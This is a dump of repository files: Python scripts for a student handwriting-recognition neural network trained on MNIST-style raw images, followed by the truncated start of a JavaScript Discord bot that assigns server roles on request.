zz[i]=(y[i]-self.layer_list[-1][i].output)\n #error+=err**2\n zz=np.array(zz)\n k=np.power(zz,2)\n k=np.divide(k,len(y))\n k=np.sum(k)\n error=np.sqrt(k)\n # error/=len(y)\n # error=math.sqrt(error)\n return error\n\n def feed_forward(self):\n for layer in self.layer_list[1:]:\n for n in layer:\n n.feed_forward()\n\n def back_propagate(self,prev):\n kk=[None]*len(prev)\n gg=[None]*len(prev)\n for i in range(len(prev)):\n kk[i]=prev[i]\n gg[i]=self.layer_list[-1][i].output\n\n #self.layer_list[-1][i].set_error(prev[i]-self.layer_list[-1][i].output)\n kk=np.array(kk)\n gg=np.array(gg)\n for i in range(len(prev)):\n self.layer_list[-1][i].error=kk[i]-gg[i]\n for layer in self.layer_list[::-1]:\n for n in layer:\n n.back_propagate()\n\n def get_results(self):\n output=[]\n for n in self.layer_list[-1]:\n out=n.output\n # if out>0.5:\n # out=1\n # else:\n # out=0\n output.append(out)\n output.pop() #remove bias neuron\n return output\n\ntrain_image=\"train_images.raw\"\n\ndef byteToPixel(file,width,length):\n stringcode='>'+'B'*len(file)\n x=struct.unpack(stringcode,file)\n\n data=np.array(x)\n\n data=data.reshape(int(len(file)/(width*length)),width*length,1)/255\n return data\n\nff=open(train_image,'rb')\nbytefile=ff.read()\ntrain_lst=byteToPixel(bytefile,28,28)\n\n\n# #read train image to integer values\n\n# train_lst=[]\n# p=\"train_img/\"\n# x=os.listdir(\"train_img\")\n# no_of_train=10 #len(x)\n# for i in range(no_of_train):\n# image=cv2.imread(p+x[i],0)\n# img=cv2.bitwise_not(image)\n# img1=[]\n# for c in img:\n# img1.extend(c)\n# train_lst.append(img1)\n\n#read training labels\nf=open(\"train_labels.txt\",'r')\nread_lines_train=f.readlines()\ntrain_label=[]\nfor line in read_lines_train:\n mlst=[]\n for c in line:\n if c.isnumeric():\n mlst.append(int(c))\n train_label.append(mlst)\ntrain_label=train_label #[:no_of_train]\n\n#read test image to integer values\n\ntest_image=\"test_images.raw\"\n\n\nfg=open(test_image,'rb')\nbytefile1=fg.read()\ntest_lst=byteToPixel(bytefile1,28,28)\nno_of_test=len(test_lst)\n\n# test_lst=[]\n# p=\"train_img/\"\n# k=os.listdir(\"train_img\")\n#no_of_test=len(k)\n# for i in range(no_of_test):\n# image=cv2.imread(p+k[i],0)\n# img=cv2.bitwise_not(image)\n# img1=[]\n# for c in img:\n# img1.extend(c)\n# test_lst.append(img1)\n\n#read test labels\ng=open(\"test_labels.txt\",'r')\nread_lines_test=g.readlines()\ntest_label=[]\nfor line in read_lines_test:\n mlst=[]\n for c in line:\n if c.isnumeric():\n mlst.append(int(c))\n test_label.append(mlst)\ntest_label=test_label #[:no_of_test]\n\n\n\n#begin neural network\nset=[]\nset.append(28*28)\nset.append(50)\nset.append(5)\nnet=N_Network(set)\nNeuron.E=0.09\nNeuron.A=0.015\ninputs=train_lst\noutputs=train_label\nwhile True:\n err=0\n zz=1\n for i in range(len(inputs)):\n net.set_input(inputs[i][0])\n net.feed_forward()\n net.back_propagate(outputs[i])\n err=net.get_error(outputs[i])\n print(zz,\"output train: \",net.get_results())\n print(\"train_label: \", train_label[i])\n zz+=1\n break\n print(\"total err: \",err)\n if err<0.1:\n break\nfor z in range(no_of_test):\n k=test_lst[z]\n net.set_input(k)\n net.feed_forward()\n print(\"Results: \",net.get_results())\n print(\"Label: \",test_label[z])\n\n"
},
{
"alpha_fraction": 0.5972095131874084,
"alphanum_fraction": 0.6177950501441956,
"avg_line_length": 23.700565338134766,
"blob_id": "06689c690a1f1726c9fce9c2c00c5a16d72b663d",
"content_id": "3c741f5cb4bd1c8070a8461a2f9487d96af84d9c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4372,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 177,
"path": "/neural network finally working.py",
"repo_name": "ksmaybe/Project-2-Handwiriting-Neural-Network",
"src_encoding": "UTF-8",
"text": "import struct\n\nimport mnist as mnist\nimport numpy as np\nfrom numba import vectorize\nimport mnist\n\nlr=0.5 #learning rate\n\n#sigmoid function/activation\ndef sigmoid(x):\n return 1/(1+np.exp(-x))\n#sigmoid prime\ndef sigmoid_derivative(x):\n return x*(1-x)\n\nbias =1\n\nclass Neural_NetWork(object):\n def __init__(self):\n #parameters\n self.input_size=784\n self.hidden_size=300\n self.output_size=5\n self.old_error=99999 #sum of error\n self.new_error=0\n self.o_error=999\n\n #The weight matrixes\n self.Weight_1=np.random.uniform(-2,2,(self.input_size,self.hidden_size))\n self.Weight_2=np.random.uniform(-2,2,(self.hidden_size,self.output_size))\n\n\n def feed_forward(self,X):\n\n self.z=np.dot(X,self.Weight_1)+bias #sum of Weight and output\n self.z2=sigmoid(self.z) #hidden layer activation\n self.z3=np.dot(self.z2,self.Weight_2)+bias\n o=sigmoid(self.z3) #output layer activation\n return o\n\n def back_propagation(self,X,y,o):\n self.o_error=np.sum((y-o)**2)/2 #get sum of error/ accuracy check\n\n #get Err\n self.d_Et_Ot=-(y - o)\n self.d_o_net=sigmoid_derivative(o).reshape((1,5))\n self.d_net_w=self.z2.repeat(5).reshape(self.hidden_size,5)*(self.Weight_2**0)\n\n #get dError/dWeight for output layer\n xx= self.d_Et_Ot * self.d_o_net\n self.d_error_w= xx*self.d_net_w\n self.Weight_2-=lr*self.d_error_w\n\n #get dError/dWeight for hidden layer\n self.d_Eo_No=self.d_Et_Ot*self.d_o_net\n self.d_No_Oh=self.Weight_2\n\n self.d_Eo_Oh=self.d_Eo_No*self.d_No_Oh\n self.d_Et_Oh=np.sum(self.d_Eo_Oh,axis=1)\n\n self.d_Oh_Nh=sigmoid_derivative(self.z2)\n yy=self.d_Et_Oh*self.d_Oh_Nh\n self.d_Et_w=X.repeat(self.hidden_size).reshape(784,self.hidden_size)*yy.reshape((1,self.hidden_size))\n self.Weight_1-=lr*self.d_Et_w\n\n\n def train(self,X,y): #forward and back once/train once\n o=self.feed_forward(X)\n self.back_propagation(X,y,o)\n\n\ntrain_image=\"train_images.raw\"\n\n#turn raw file to np array\ndef byteToPixel(file,width,length):\n stringcode='>'+'B'*len(file)\n x=struct.unpack(stringcode,file)\n\n data=np.array(x)\n\n data=data.reshape(int(len(file)/(width*length)),width*length)/255\n\n return data\n\nff=open(train_image,'rb') #read raw\nbytefile=ff.read()\ntrain_lst=byteToPixel(bytefile,28,28)\n\n\n\n#read training labels\nf=open(\"train_labels.txt\",'r')\nread_lines_train=f.readlines()\ntrain_label=[]\nfor line in read_lines_train:\n mlst=[]\n for c in line:\n if c.isnumeric():\n mlst.append(int(c))\n train_label.append(mlst)\ntrain_label=np.array(train_label) #[:no_of_train]\n\n#read test image to integer values\n\ntest_image=\"test_images.raw\"\n\nfg=open(test_image,'rb')\nbytefile1=fg.read()\ntest_lst=byteToPixel(bytefile1,28,28)\nno_of_test=len(test_lst)\n\n\ng=open(\"test_labels.txt\",'r')\nread_lines_test=g.readlines()\ntest_label=[]\nfor line in read_lines_test:\n mlst=[]\n for c in line:\n if c.isnumeric():\n mlst.append(int(c))\n test_label.append(mlst)\ntest_label=np.array(test_label) #[:no_of_test]\n\n\nX=train_lst\ny=train_label\n\n#start of training\nnet=Neural_NetWork()\nlstp=[]\nfor e in range(100):\n print(\"e:\",e)\n for i in range(len(train_lst)):\n X=train_lst[i]\n y=train_label[i]\n o=net.feed_forward(X)\n net.train(X,y)\n net.new_error+=net.o_error\n lstp.append(net.new_error)\n print(net.new_error)\n if net.old_error-net.new_error<5 and e>10 and net.new_error<1000: #after 10 epoches and change in sum of error between epoch very small\n break\n net.old_error=net.new_error\n net.new_error=0\n\n#draw confusion matrix\nconfusion_matrix=np.array([0]*25).reshape(5,5)\nsuccess=0\nfor i in range(len(test_label)):\n\n o=net.feed_forward(test_lst[i])\n x=0\n y=0\n for j in range(5):\n if test_label[i][j]==1:\n x=j\n break\n\n for j in range(len(o)):\n if max(o)==o[j]:\n y=j\n break\n confusion_matrix[x][y]+=1\n if x==y:\n success+=1\n\n\n\n\n\nprint()\nprint(\"confusion matrix\")\nprint(confusion_matrix)\nprint()\nprint(\"success: \",success,'/',len(test_label))\nprint(\"success rate: \",float(success/len(test_label)))\n"
},
{
"alpha_fraction": 0.5402542352676392,
"alphanum_fraction": 0.5583590269088745,
"avg_line_length": 24.426469802856445,
"blob_id": "4a46240be1a69b82ed52832be2cf5f43806d5c86",
"content_id": "aedb8ce645a6caf3ee224dd7d347cec96a73e7ee",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5192,
"license_type": "no_license",
"max_line_length": 78,
"num_lines": 204,
"path": "/neural net.py",
"repo_name": "ksmaybe/Project-2-Handwiriting-Neural-Network",
"src_encoding": "UTF-8",
"text": "import struct\nimport numpy as np\nimport cv2\nimport os\n\nnp.random.seed(0)\nweights=np.random.rand(28*28)\nbias=np.random.rand(1)\nlr=0.1 #learning rate\nclass NeuralNetwork:\n def __init__(self,hidden,output):\n self.error=0\n self.input=input\n #[weight,d_change]\n self.h=hidden\n self.hidden=[[None,None] for zz in range(hidden)]\n self.h_out=np.array([None]*self.h)\n\n self.o=output\n self.output=[[None,None] for zz in range(output)]\n self.o_out=np.array([None]*self.o)\n d_weight1=np.array([None]*self.h)\n self.h_dw=d_weight1\n d_weight2=np.array([None]*self.o)\n self.o_dw=d_weight2\n d_total1=np.array([None]*self.h)\n self.h_dt=d_total1\n d_total2=np.array([None]*self.o)\n self.o_dt=d_total2\n\n\n\n\ndef sigmoid(x):\n return 1/(1+np.exp(-x))\n\ndef sigmoid_derivative(x):\n return x*(1-x)\n\ntrain_image=\"train_images.raw\"\n\ndef byteToPixel(file,width,length):\n stringcode='>'+'B'*len(file)\n x=struct.unpack(stringcode,file)\n\n data=np.array(x)\n\n data=data.reshape(int(len(file)/(width*length)),width*length)/255\n\n return data\n\nff=open(train_image,'rb')\nbytefile=ff.read()\ntrain_lst=byteToPixel(bytefile,28,28)\n\n# #read train image to integer values\n\n# train_lst=[]\n# p=\"train_img/\"\n# x=os.listdir(\"train_img\")\n# no_of_train=10 #len(x)\n# for i in range(no_of_train):\n# image=cv2.imread(p+x[i],0)\n# img=cv2.bitwise_not(image)\n# img1=[]\n# for c in img:\n# img1.extend(c)\n# train_lst.append(img1)\n\n#read training labels\nf=open(\"train_labels.txt\",'r')\nread_lines_train=f.readlines()\ntrain_label=[]\nfor line in read_lines_train:\n mlst=[]\n for c in line:\n if c.isnumeric():\n mlst.append(int(c))\n train_label.append(mlst)\ntrain_label=np.array(train_label) #[:no_of_train]\n\n#read test image to integer values\n\ntest_image=\"test_images.raw\"\n\n\nfg=open(test_image,'rb')\nbytefile1=fg.read()\ntest_lst=byteToPixel(bytefile1,28,28)\nno_of_test=len(test_lst)\n\n# test_lst=[]\n# p=\"train_img/\"\n# k=os.listdir(\"train_img\")\n#no_of_test=len(k)\n# for i in range(no_of_test):\n# image=cv2.imread(p+k[i],0)\n# img=cv2.bitwise_not(image)\n# img1=[]\n# for c in img:\n# img1.extend(c)\n# test_lst.append(img1)\n\n#read test labels\ng=open(\"test_labels.txt\",'r')\nread_lines_test=g.readlines()\ntest_label=[]\nfor line in read_lines_test:\n mlst=[]\n for c in line:\n if c.isnumeric():\n mlst.append(int(c))\n test_label.append(mlst)\ntest_label=np.array(test_label) #[:no_of_test]\n\nnet=NeuralNetwork(30,5)\nfor i in range(net.h):\n weight=np.array(np.random.rand(28*28))\n net.hidden[i][0]=weight\n net.hidden[i][1]=np.array([None]*28*28)\n\nfor i in range(net.o):\n weight=np.array(np.random.rand(net.h))\n net.output[i][0]=weight\n net.output[i][1]=np.array([None]*net.h)\n\ntrain_no=len(train_lst)\nfor epoch in range(1):\n for i in range(train_no):\n net.input=train_lst[i]\n for j in range(net.h):\n XW=np.dot(net.input,net.hidden[j][0])+bias\n z=sigmoid(XW)\n net.h_out[j]=z\n #print('h',XW)\n\n for k in range(net.o):\n XW=np.dot(net.h_out,net.output[k][0])+bias\n z=sigmoid(XW)\n net.o_out[k]=z\n\n #print('o',XW)\n error=net.o_out-train_label[i]\n print(error)\n err=[None]*5\n for ii in range(5):\n err[ii]=error[ii]**2\n MSE=np.divide(np.sum(err),2)\n net.error+=MSE\n print(MSE)\n print(\"total error: \",net.error)\n print(net.o_out)\n print(\"image: \",i+1)\n for pp in range(5):\n\n net.o_dw[pp]=sigmoid_derivative(net.o_out[pp])\n net.o_dt[pp]=-(train_label[i][pp]-net.o_out[pp])\n\n net.output[pp][1]=net.o_dw[pp]*net.o_dt[pp]*net.h_out\n net.output[pp][0]=np.subtract(net.output[pp][0],net.output[pp][1])\n\n\n for ll in range(net.h):\n net.h_dw[ll]=sigmoid_derivative(net.h_out[ll])\n zzz=0\n for llp in range(net.o):\n zzz+=net.output[llp][0][ll]\n print(zzz,\"haha\")\n zz=np.sum(net.o_dw*zzz)\n #net.o_dt[llp]*net.o_dw[llp]*net.output[llp][0][ll]\n net.h_dt[ll]=zz*net.o_dt\n # for lll in range(28*28):\n # z=net.input[lll]\n #net.hidden[ll][1][lll]=net.h_dw[ll]*net.h_dt[ll]*z\n\n print(net.h_dw[ll], net.h_dt[ll])\n\n net.hidden[ll][1]=net.input#*zzzz\n\n net.hidden[ll][0]=np.subtract(net.hidden[ll][0],net.hidden[ll][1])\n print(\"dw\")\n print(net.h_dw)\n print(net.o_dw)\n print(\"else\")\n\n # error= z-train_label[i]\n # print(\"image: \",i+1)\n # print(\"epoch: \",epoch+1)\n # print(\"error sum: \",error.sum())\n #\n #\n # dcost_dpred=error\n # dpred_dz=sigmoid_derivative(z)\n #\n # z_delta=dcost_dpred*dpred_dz\n #\n # inputs=train_lst[i].T\n # weights-=lr*np.dot(inputs,z_delta)\n #\n # for num in z_delta:\n # bias-=lr*num\n print(\"epoch: \",epoch+1)\n if net.error<0.01:\n break\n\n\n\n\n\n"
},
{
"alpha_fraction": 0.5967742204666138,
"alphanum_fraction": 0.6404569745063782,
"avg_line_length": 21.560606002807617,
"blob_id": "d01fff5eb77c528dc23d8f422ebbbfe7289f9781",
"content_id": "6699b8240082bdcfdb367bffc606e73223182c62",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1488,
"license_type": "no_license",
"max_line_length": 66,
"num_lines": 66,
"path": "/test.py",
"repo_name": "ksmaybe/Project-2-Handwiriting-Neural-Network",
"src_encoding": "UTF-8",
"text": "import struct\n\n\nimport random\n\nimport gzip\nimport cv2\nimport os\nimport copy\nimport numpy as np\n\n\n#\n# f = gzip.open('train-labels-idx1-ubyte.gz','r')\n# train_labeler=np.array([])\n#\n# for i in range(1):\n# buf = f.read(8)\n# labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64)\n# print(labels)\n# for i in range(60000):\n# buf = f.read(1)\n# labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64)\n# train_labeler=np.append(train_labeler,labels)\n# train_label=[]\n# for j in range(len(train_labeler)):\n# x=[0]*10\n# x[int(train_labeler[j])]=1\n# train_label.append(x)\n# print(len(train_label))\n\n\nf = gzip.open('train-images-idx3-ubyte.gz','r')\ntrain_lst=np.array([])\n\nfor i in range(2):\n buf = f.read(8)\n labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64)\n print(labels)\nkk=0\nkkk=0\nbuf = f.read(28*28*60001)\nlabels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64)\ntrain_lst=np.append(train_lst,labels)\nprint(train_lst,'train_lst')\nfor j in range(len(train_lst)):\n if train_lst[j]>0:\n kk+=1\n if train_lst[j]>kkk:\n kkk=train_lst[j]\n\nprint(kk)\nprint(kkk)\ntrain_lst=train_lst.reshape(int(len(train_lst)/(28*28)),28*28)/255\nprint(len(train_lst))\n\n\n\n# for i in range(2):\n# buf = f.read(8)\n# labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64)\n# print(labels)\n# for i in range(28):\n# buf = f.read(28)\n# labels = np.frombuffer(buf, dtype=np.uint8).astype(np.int64)\n# print(labels)"
},
{
"alpha_fraction": 0.4117647111415863,
"alphanum_fraction": 0.5882353186607361,
"avg_line_length": 8,
"blob_id": "bbe3dbc37291e19d92df1e9d22af8e623b427a49",
"content_id": "e1c1ee3be27d904d5aeff35972757ed9655cac41",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17,
"license_type": "no_license",
"max_line_length": 8,
"num_lines": 2,
"path": "/testing.py",
"repo_name": "ksmaybe/Project-2-Handwiriting-Neural-Network",
"src_encoding": "UTF-8",
"text": "x=[0]*10\nprint(x)"
},
{
"alpha_fraction": 0.8529411554336548,
"alphanum_fraction": 0.8823529481887817,
"avg_line_length": 33,
"blob_id": "21ad9aa02a064b0293938fd3cbe9427d7ad41064",
"content_id": "54b99efce0de02c0f00c9c3227884f686d7259de",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 34,
"license_type": "no_license",
"max_line_length": 33,
"num_lines": 1,
"path": "/README.md",
"repo_name": "ksmaybe/Project-2-Handwiriting-Neural-Network",
"src_encoding": "UTF-8",
"text": "Project 2 Handwriting Recognition\n"
}
] | 6 |
ZenIsBestWolf/toolbox | https://github.com/ZenIsBestWolf/toolbox | 7c39f450a1c000108f7da2758add6ee13bbe5902 | a1baae0e9a34c952b3c8abb4f6591dee12f1c4bb | 0f76e218b6a044dab223822825fe3b28c097fdc5 | refs/heads/master | 2023-03-09T10:39:02.835294 | 2021-03-03T18:22:33 | 2021-03-03T18:22:33 | 286,537,588 | 1 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5522642135620117,
"alphanum_fraction": 0.5734229683876038,
"avg_line_length": 35.32902145385742,
"blob_id": "030b5439d6892eb7e2b06dcd716cf28012358d7b",
"content_id": "ea429d0278c98a9e184a0a2e1289929945a08fba",
"detected_licenses": [
"MIT",
"Unlicense",
"LicenseRef-scancode-public-domain"
],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 25285,
"license_type": "permissive",
"max_line_length": 261,
"num_lines": 696,
"path": "/JavaScript/DiscordBots/skid-bot/index.js",
"repo_name": "ZenIsBestWolf/toolbox",
"src_encoding": "UTF-8",
"text": "// Skid Bot created by ZenIsBestWolf#0446.\n// This is intended for one server only. Things may break if used in multiple servers.\n// This also wasn't designed to be forked. Forking this and trying to use this in your server will cause issues!\nconst Discord = require('discord.js');\nconst client = new Discord.Client();\nvar token = process.env.TOKEN;\nvar prefix = \".\"\nvar zen = \"183672121522782208\"\nvar requestChannelID = \"376485787245608970\"\nclient.on('ready', () => {\n\tconsole.log('Skid Bot is online. Prefix is ' + prefix)\n\tclient.user.setGame('being a skid.')\n});\nvar memberTrackingChannelID = \"376484628762198027\"\nclient.on('guildMemberAdd', member => {\n\tlet guild = member.guild;\n\tguild.channels.get(memberTrackingChannelID).send(member + \" has joined the server! Welcome!\");\n});\nclient.on('guildMemberRemove', member => {\n\tlet guild = member.guild;\n\tguild.channels.get(memberTrackingChannelID).send(member + \" has left. RIP!\");\n});\nclient.on('message', message => {\n\tif (!message.content.startsWith(prefix)) return;\n\tif (message.author.bot) return;\n\tvar args = message.content.substring(prefix.length).split(\" \");\n\tif (message.channel.id === requestChannelID) {\n\t\tvar role = args.join(' ').slice(args[0].length).trim().toLowerCase()\n\t\tswitch (args[0].toLowerCase()) {\n\t\t\tcase \"addrole\":\n\t\t\t\tswitch (role) {\n\t\t\t\t\tcase \"android\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Android\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"Android\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"bacon\":\n\t\t\t\t\t\tmessage.reply(\":smirk: Either you looked at the source code or you really wanted to know if there was a bacon role. God dammit.\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"bot\":\n\t\t\t\t\t\tmessage.reply(\":x: You aren't a bot silly!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"furry\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Furry\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"Furry\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"gamer\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Gamer\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"Gamer\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"ios\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"iOS\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"iOS\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"little boys\":\n\t\t\t\t\t\tmessage.reply(\":x: No one is eligible for this role.\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"lol\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"LoL\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"LoL\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"league of legends\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"LoL\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"LoL\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"meme lord\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Meme Lord\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"Meme Lord\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"muted\":\n\t\t\t\t\t\tmessage.reply(\":x: Trust me, you don\\'t want that role.\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"nintendo switch\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Nintendo Switch\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"Nintendo Switch\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"overwatch\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"Overwatch\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"Overwatch\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"pc\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"PC Master Race\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"PC Master Race\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"pc master race\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"PC Master Race\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", \"PC Master Race\"));\n\t\t\t\t\t\tmessage.reply(\":white_check_mark: Role added!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\tbreak;\n\t\t\t\t\tcase \"playstation\":\n\t\t\t\t\t\tif (message.member.roles.exists(\"name\", \"PlayStation\")) {\n\t\t\t\t\t\t\tmessage.reply(\":x: You already have that role!\").then(e => setTimeout(function() {\n\t\t\t\t\t\t\t\te.delete();\n\t\t\t\t\t\t\t}, 10000));\n\t\t\t\t\t\t\tmessage.delete();\n\t\t\t\t\t\t\treturn;\n\t\t\t\t\t\t};\n\t\t\t\t\t\tmessage.member.addRole(message.member.guild.roles.find(\"name\", 